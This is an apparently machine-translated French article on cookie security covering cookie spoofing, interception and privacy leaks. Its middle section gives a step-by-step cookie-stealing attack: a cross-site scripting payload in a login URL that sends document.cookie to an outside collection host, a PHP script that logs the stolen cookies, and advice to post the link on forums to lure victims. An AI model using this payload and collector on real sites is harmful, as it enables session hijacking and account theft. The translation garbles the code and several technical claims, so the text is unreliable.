Le but des cookies est de faire la commodité aux utilisateurs et d'ajouter de la valeur au site Web, et ne constitue généralement pas de menace de sécurité sérieuse. Un fichier de cookie ne peut pas être exécuté en tant que code, ni transmet des virus, il est propriétaire pour l'utilisateur et ne peut être lu que par le serveur qui l'a créé. De plus, les navigateurs ne permettent généralement pas que 300 cookies soient stockés, chaque site stocke jusqu'à 20 cookies et la taille de chaque cookie est limitée à 4 Ko. Par conséquent, les cookies ne rempliront pas le disque dur et ne seront pas utilisés comme une méthode d'attaque de «déni de service».
Cependant, en tant que substitut à l'identité des utilisateurs, sa sécurité détermine parfois la sécurité de l'ensemble du système et la sécurité des cookies ne peut être ignorée.
(1) Les cookies cookies cookies enregistrent des informations tels que l'ID de compte de l'utilisateur, le mot de passe, etc., et sont généralement chiffrés à l'aide de la méthode MD5 et transmis sur Internet. Les informations chiffrées ne peuvent pas être comprises même si elles sont interceptées par certaines personnes avec des arrière-pensées sur Internet. Cependant, le problème est maintenant que les personnes qui interceptent les cookies n'ont pas besoin de connaître le sens de ces cordes. Tant que quelqu'un soumet les cookies des autres au serveur et peut passer la vérification, il peut se connecter au site Web en tant que victime. Ce comportement est appelé usurpation des cookies.
Les utilisateurs illégaux obtiennent des clés de chiffrement correspondantes via des cookies, accédant ainsi à toutes les informations personnalisées des utilisateurs légitimes, y compris les informations par e-mail et même le compte de l'utilisateur, causant de graves dommages aux informations personnelles.
(2) Interception des cookies
Les cookies sont transmis entre le navigateur et le serveur en texte brut, et sont facilement interceptés et exploités par d'autres. Les cookies peuvent être lus par quiconque peut intercepter les communications Web.
Une fois qu'un cookie a été intercepté par un utilisateur illégal, puis rejoué dans sa période valide, l'utilisateur illégal bénéficiera des droits et des intérêts de l'utilisateur légal. Par exemple, pour la lecture en ligne, les utilisateurs illégaux peuvent profiter de la lecture en ligne de magazines électroniques sans payer de frais.
Il existe certaines méthodes pour intercepter les cookies :
(1) Utiliser des méthodes de programmation pour intercepter les cookies. Ce qui suit est l'analyse de sa méthode, qui est terminée en deux étapes.
Étape 1: Positionnez le site Web qui doit collecter des cookies, les analyser et construire des URL. Tout d'abord, ouvrez le site Web pour collecter des cookies. Ici, supposons que c'est http://www.xxx.net, connectez-vous au site Web et entrez le nom d'utilisateur "<Al>" (à l'exclusion des devis), analysez les données et saisissez le paquet, et obtenez le code suivant:
http://www.xxx.net/txl/login/login.pl? username = <al> & passwd = & ok.x = 28 & ok.y = 6;
Remplacer "<al>" par:
"<Script> alert (document.cookie) </cript>" Ressayez, et si l'exécution réussit, commencez à construire l'URL:
http://www.xxx.net/txl/login/login.pl? username = <script> window.open ("http://www.cbifamily.org/cbi.php?"%2BDocument.cookie)</script>&passwd=&ok.x=28&ok.y=6.
Parmi eux, http://www.cbifamily.org/cbi.php est un script sur un hôte que l'utilisateur peut contrôler. Il convient de noter que "% 2b" est le codage URL du symbole "+", car "+" sera traité comme un espace. Cette URL peut être publiée dans le forum pour inciter d'autres à cliquer.
Étape 2: Préparez un script PHP pour collecter des cookies et placer sur un site Web que l'utilisateur peut contrôler. Lorsque la personne inconnue clique sur l'URL construite, le code PHP peut être exécuté. Le contenu spécifique de ce script est le suivant:
La copie de code est la suivante:
<? Php
$ info = getenv ("ouery_string");
if ($ info) {
$ fp = fopen ("info.txt", "a");
fwrite ($ fp ,! info. "/ n");
fclose ($ fp);
}
En-tête ("Emplacement: http: //www.xxx.net");
?>
Mettre ce code sur le réseau peut collecter les cookies de chacun. Si un forum autorise le code HTML ou les balises flash, vous pouvez utiliser ces technologies pour collecter des cookies et les mettre dans le forum, puis donner au message un sujet attrayant et écrire un contenu intéressant, et collecter rapidement un grand nombre de cookies. Sur le forum, les mots de passe de nombreuses personnes ont été volés par cette méthode.
(2) Utilisez le danger caché du code de Flash pour intercepter les cookies. Il y a une fonction getUrl () dans Flash. Flash peut utiliser cette fonction pour ouvrir automatiquement une page Web spécifiée, ce qui peut conduire l'utilisateur à un site Web contenant du code malveillant. Par exemple, lorsqu'un utilisateur bénéficie d'une animation flash sur un ordinateur, le code dans le cadre d'animation peut avoir été tranquillement connecté à Internet et ouvrir une très petite page contenant du code spécial qui peut collecter des cookies et faire d'autres choses nuisibles. Le site Web ne peut pas interdire cette action de Flash car il s'agit d'une fonction interne du fichier flash.
(3) Confidentialité du réseau de fuite de cookies
La principale raison pour laquelle les cookies mènent à des fuites de confidentialité en ligne est :! Prépare par des intérêts commerciaux. Avec la montée en puissance du commerce électronique et de l'émergence d'énormes opportunités commerciales sur Internet, certains sites Web et institutions abusent des cookies et utilisent la technologie des moteurs de recherche, la technologie d'exploration de données et même la technologie de tromperie en ligne pour collecter les informations personnelles des autres sans l'autorisation des visiteurs, afin d'atteindre des objectifs de bénéfice tels que la création de bases de données d'utilisateurs et l'envoi de publicités, provoquant la fuite de la confidentialité personnelle des utilisateurs. "L'ouverture de la transmission d'informations sur les cookies. Les fichiers cookies ont des processus de livraison spéciaux et des caractéristiques du texte. Les fichiers de cookies qui ne sont pas cryptés en toute sécurité sont transmis entre le serveur et le client, ce qui peut facilement entraîner la fuite d'informations personnelles.
Ce qui précède est toute compréhension personnelle de la sécurité des cookies. S'il y a des omissions, veuillez les corriger.